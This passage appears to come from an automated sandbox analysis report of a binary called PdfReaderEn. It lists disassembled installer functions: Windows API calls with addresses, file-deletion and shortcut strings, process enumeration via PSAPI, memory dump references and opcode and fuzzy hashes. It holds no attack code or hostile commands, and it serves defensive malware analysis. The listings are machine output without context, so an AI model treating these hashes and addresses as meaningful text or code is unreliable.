                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                          • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                          • String ID: $ @$M$N
                                                                                                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                                                                                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                                                                                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                          • String ID: 82D$@%F$@rD$A
                                                                                                                                                                                          • API String ID: 3347642858-1086125096
                                                                                                                                                                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                                                                                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                                                                                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                          • \*.*, xrefs: 00406D03
                                                                                                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                          • API String ID: 2035342205-3294556389
                                                                                                                                                                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                          • API String ID: 542301482-1377821865
                                                                                                                                                                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                          • API String ID: 20674999-2124804629
                                                                                                                                                                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                          • String ID: @%F$N$open
                                                                                                                                                                                          • API String ID: 3928313111-3849437375
                                                                                                                                                                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
